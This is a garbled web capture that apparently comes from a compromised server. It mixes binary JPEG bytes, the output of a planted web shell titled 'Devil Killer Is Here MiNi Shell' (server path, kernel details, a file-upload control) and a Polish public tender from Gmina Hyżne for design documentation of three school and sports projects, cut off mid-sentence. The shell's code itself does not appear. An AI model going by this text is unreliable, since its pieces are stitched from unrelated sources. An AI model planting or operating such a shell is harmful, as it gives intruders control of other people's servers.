JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211209/0030810802-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowo kosztorysowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA HYŻNE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690582080</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">103</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Hyżne</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-024</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0172304564</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">0172295001</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniap@hyzne.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://hyzne.pl/14-bip/10033-przetargi.html#tresc</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowo kosztorysowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f93db33d-58e8-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00308108</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003556/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Opracowanie dokumentacji projektowo kosztorysowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://hyzne.pl/14-bip/10033- przetargi.html#tresc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Platformy Zamówień Publicznych<br/>ZETOPZP: https://pzp.hyzne.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się elektronicznie przy użyciu:1) Platformy Zamówień Publicznych ZETOPZP: https://pzp.hyzne.pl/2)<br/>poczty elektronicznej: adres e-mail Zamawiającego: zamowieniap@hyzne.pl2. We wszelkiej<br/>korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się<br/>nadanym przez Zamawiającego numerem sprawy: RIG5.271.9.2021.JG lub numerem ogłoszenia<br/>(TED) lub identyfikatorem postępowania wygenerowanym przez ZETOPZP: https://pzp.hyzne.pl/3.<br/>Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: 1) w zakresie procedury<br/>udzielenia zamówienia:  Joanna Groszek2) w zakresie przedmiotu zamówienia: Paweł Fudali, Beata Czerwonka <br/> 4. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie<br/>rejestrując się lub logując, w przypadku posiadania konta w Platformie Zamówień Publicznych<br/>ZETOPZP, akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na<br/>stronie internetowej https://pzp.hyzne.pl/ oraz uznaje go za wiążący.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:1) Administratorem Państwa danych osobowych jest<br/>Gmina Hyżne, Hyżne 103, 36-024 Hyżne 2) Dane kontaktowe inspektora ochrony danych: e-mail:<br/>iod@hyzne.pl3) Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w<br/>celu przeprowadzenia postepowania o udzielenie zamówienia publicznego na podstawie Pzp.4)<br/>Odbiorcami Państwa danych osobowych będą wyłącznie podmioty uprawnione do uzyskania danych<br/>osobowych na podstawie przepisów prawa.5) Państwa dane osobowe przechowywane będą w czasie<br/>określonym przepisami prawa, zgodnie z instrukcją kancelaryjną i przepisami prawa.6) Obowiązek<br/>podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem<br/>ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z Pzp.7) W<br/>odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.8) Posiadają Państwo:a) na podstawie art. 15 RODO<br/>prawo dostępu do danych osobowych Państwa dotyczących;b) na podstawie art. 16 RODO prawo do<br/>sprostowania Państwa danych osobowych*;c) na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO **;d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza<br/>przepisy RODO;9) Nie przysługuje Państwu:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO;c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.*<br/>Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z Pzp<br/>oraz nie może naruszać integralności protokołu oraz jego załączników.** Wyjaśnienie: prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIG5.271.9.2021.</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1: Modernizacja budynku Szkoły Podstawowej im. PCK w Dylągówce wraz z infrastrukturą sportowo – rekreacyjną </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">240 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1 O wyborze najkorzystniejszej oferty decydować będą kryteria: 1.(P1) - cena ofertowa (brutto) - 60%<br/><br/>Punkty będą przyznawane według poniższej zasady: 1.Kryterium ceny oceniane będzie według wzoru:<br/>Cn<br/>P1 =	x 100 x 60%<br/>Cb<br/>gdzie:<br/>P1- ilość punktów w kryterium cena Cn – najniższa cena,<br/>Cb – cena oferty badanej, 100– wskaźnik stały,<br/>60% – procentowe znaczenie kryterium ceny.<br/>2.	Kryterium doświadczenie projektanta branży konstrukcyjnej oraz architektonicznej <br/>- brak doświadczenia w wykonaniu zamówienia na usługę polegającą na wykonaniu dokumentacji projektowej w zakresie infrastruktury komunalnej i sportowej – 0 pkt, <br/>- wykonał co najmniej dwa zadania na usługę polegającą na wykonaniu dokumentacji projektowej w zakresie infrastruktury komunalnej i sportowej – 0 pkt, <br/>- wykonał co najmniej trzy zadania na usługę polegającą na wykonaniu dokumentacji projektowej w zakresie infrastruktury komunalnej i sportowej – 20 pkt, <br/>- wykonał co najmniej cztery zadania na usługę polegającą na wykonaniu dokumentacji projektowej w zakresie infrastruktury komunalnej i sportowej – 40 pkt, <br/>Do oceny oferty w ramach kryterium „Doświadczenie projektanta w specjalności architektonicznej” brana będzie wyłącznie treść wykazu jaka złożona została przez Wykonawcę w ofercie. W okolicznościach, gdy Wykaz osób, o którym mowa w Rozdziale V, składany na potwierdzenie spełniania warunków udziału w postępowaniu zostanie uzupełniony na etapie badania warunków udziału w postepowaniu informacje w nim zawarte nie będą wpływały na dokonaną uprzednio przez Zamawiającego ocenę ofert. W przypadku, gdy osoba wskazana celem uzyskania punktów w ramach kryterium oceny ofert wskazanych w ramach doświadczenia projektanta w specjalności architektonicznej i konstrukcyjnej nie spełnia warunków udziału w postępowaniu oferta Wykonawcy otrzyma zero punktów w ramach tego kryterium. W sytuacji gdy Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu wskaże inną osobę niż wskazana w ramach spełnienia kryterium doświadczenia projektanta w specjalności architektonicznej i konstrukcyjnej oferta wykonawcy otrzyma zero punktów. Dotyczy wyłącznie sytuacji, w której wykonawca zadeklaruje spełnianie warunków ponad wymagane minimum (podlegające ocenie w ramach doświadczenia projektanta w specjalności architektonicznej i konstrukcyjnej)<br/><br/>Ilość punktów przyznanych badanej ofercie P to suma punktów z kryterium cena P1 (maksymalnie 60 pkt) i kryterium doświadczenia projektanta w specjalności architektonicznej P2 (maksymalnie 40 pkt ) P=P1+P2 Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100)<br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).<br/>Ocenie będą podlegały oferty niepodlegające odrzuceniu.<br/>Obliczenie będzie dokonywane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie projektanta branży konstrukcyjnej oraz architektonicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2: Doposażenie boiska sportowego w m. Hyżne </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1 O wyborze najkorzystniejszej oferty decydować będą kryteria: 1.(P1) - cena ofertowa (brutto) - 60%<br/><br/>Punkty będą przyznawane według poniższej zasady: 1.Kryterium ceny oceniane będzie według wzoru:<br/>Cn<br/>P1 =	x 100 x 60%<br/>Cb<br/>gdzie:<br/>P1- ilość punktów w kryterium cena Cn – najniższa cena,<br/>Cb – cena oferty badanej, 100– wskaźnik stały,<br/>60% – procentowe znaczenie kryterium ceny.<br/>2.	Kryterium doświadczenie projektanta branży konstrukcyjnej oraz architektonicznej <br/>- brak doświadczenia w wykonaniu zamówienia na usługę polegającą na wykonaniu dokumentacji projektowej w zakresie infrastruktury komunalnej i sportowej – 0 pkt, <br/>- wykonał co najmniej dwa zadania na usługę polegającą na wykonaniu dokumentacji projektowej w zakresie infrastruktury komunalnej i sportowej – 0 pkt, <br/>- wykonał co najmniej trzy zadania na usługę polegającą na wykonaniu dokumentacji projektowej w zakresie infrastruktury komunalnej i sportowej – 20 pkt, <br/>- wykonał co najmniej cztery zadania na usługę polegającą na wykonaniu dokumentacji projektowej w zakresie infrastruktury komunalnej i sportowej – 40 pkt, <br/>Do oceny oferty w ramach kryterium „Doświadczenie projektanta w specjalności architektonicznej” brana będzie wyłącznie treść wykazu jaka złożona została przez Wykonawcę w ofercie. W okolicznościach, gdy Wykaz osób, o którym mowa w Rozdziale V, składany na potwierdzenie spełniania warunków udziału w postępowaniu zostanie uzupełniony na etapie badania warunków udziału w postepowaniu informacje w nim zawarte nie będą wpływały na dokonaną uprzednio przez Zamawiającego ocenę ofert. W przypadku, gdy osoba wskazana celem uzyskania punktów w ramach kryterium oceny ofert wskazanych w ramach doświadczenia projektanta w specjalności architektonicznej i konstrukcyjnej nie spełnia warunków udziału w postępowaniu oferta Wykonawcy otrzyma zero punktów w ramach tego kryterium. W sytuacji gdy Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu wskaże inną osobę niż wskazana w ramach spełnienia kryterium doświadczenia projektanta w specjalności architektonicznej i konstrukcyjnej oferta wykonawcy otrzyma zero punktów. Dotyczy wyłącznie sytuacji, w której wykonawca zadeklaruje spełnianie warunków ponad wymagane minimum (podlegające ocenie w ramach doświadczenia projektanta w specjalności architektonicznej i konstrukcyjnej)<br/><br/>Ilość punktów przyznanych badanej ofercie P to suma punktów z kryterium cena P1 (maksymalnie 60 pkt) i kryterium doświadczenia projektanta w specjalności architektonicznej P2 (maksymalnie 40 pkt ) P=P1+P2 Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100)<br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).<br/>Ocenie będą podlegały oferty niepodlegające odrzuceniu.<br/>Obliczenie będzie dokonywane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie projektanta branży konstrukcyjnej oraz architektonicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3: Budowa Sali gimnastycznej przy Szkole Podstawowej w Szklarach </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">315 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1 O wyborze najkorzystniejszej oferty decydować będą kryteria: 1.(P1) - cena ofertowa (brutto) - 60%<br/>Punkty będą przyznawane według poniższej zasady: 1.Kryterium ceny oceniane będzie według wzoru:<br/>Cn<br/>P1 =	x 100 x 60%<br/>Cb<br/>gdzie:<br/>P1- ilość punktów w kryterium cena Cn – najniższa cena,<br/>Cb – cena oferty badanej, 100– wskaźnik stały,<br/>60% – procentowe znaczenie kryterium ceny.<br/>2.	Kryterium doświadczenie projektanta branży konstrukcyjnej oraz architektonicznej <br/>- brak doświadczenia w wykonaniu zamówienia na usługę polegającą na wykonaniu dokumentacji projektowej w zakresie infrastruktury komunalnej i sportowej – 0 pkt, <br/>- wykonał co najmniej dwa zadania na usługę polegającą na wykonaniu dokumentacji projektowej w zakresie infrastruktury komunalnej i sportowej – 0 pkt, <br/>- wykonał co najmniej trzy zadania na usługę polegającą na wykonaniu dokumentacji projektowej w zakresie infrastruktury komunalnej i sportowej – 20 pkt, <br/>- wykonał co najmniej cztery zadania na usługę polegającą na wykonaniu dokumentacji projektowej w zakresie infrastruktury komunalnej i sportowej – 40 pkt, <br/>Do oceny oferty w ramach kryterium „Doświadczenie projektanta w specjalności architektonicznej” brana będzie wyłącznie treść wykazu jaka złożona została przez Wykonawcę w ofercie. W okolicznościach, gdy Wykaz osób, o którym mowa w Rozdziale V, składany na potwierdzenie spełniania warunków udziału w postępowaniu zostanie uzupełniony na etapie badania warunków udziału w postepowaniu informacje w nim zawarte nie będą wpływały na dokonaną uprzednio przez Zamawiającego ocenę ofert. W przypadku, gdy osoba wskazana celem uzyskania punktów w ramach kryterium oceny ofert wskazanych w ramach doświadczenia projektanta w specjalności architektonicznej i konstrukcyjnej nie spełnia warunków udziału w postępowaniu oferta Wykonawcy otrzyma zero punktów w ramach tego kryterium. W sytuacji gdy Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu wskaże inną osobę niż wskazana w ramach spełnienia kryterium doświadczenia projektanta w specjalności architektonicznej i konstrukcyjnej oferta wykonawcy otrzyma zero punktów. Dotyczy wyłącznie sytuacji, w której wykonawca zadeklaruje spełnianie warunków ponad wymagane minimum (podlegające ocenie w ramach doświadczenia projektanta w specjalności architektonicznej i konstrukcyjnej)<br/><br/>Ilość punktów przyznanych badanej ofercie P to suma punktów z kryterium cena P1 (maksymalnie 60 pkt) i kryterium doświadczenia projektanta w specjalności architektonicznej P2 (maksymalnie 40 pkt ) P=P1+P2 Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100)<br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 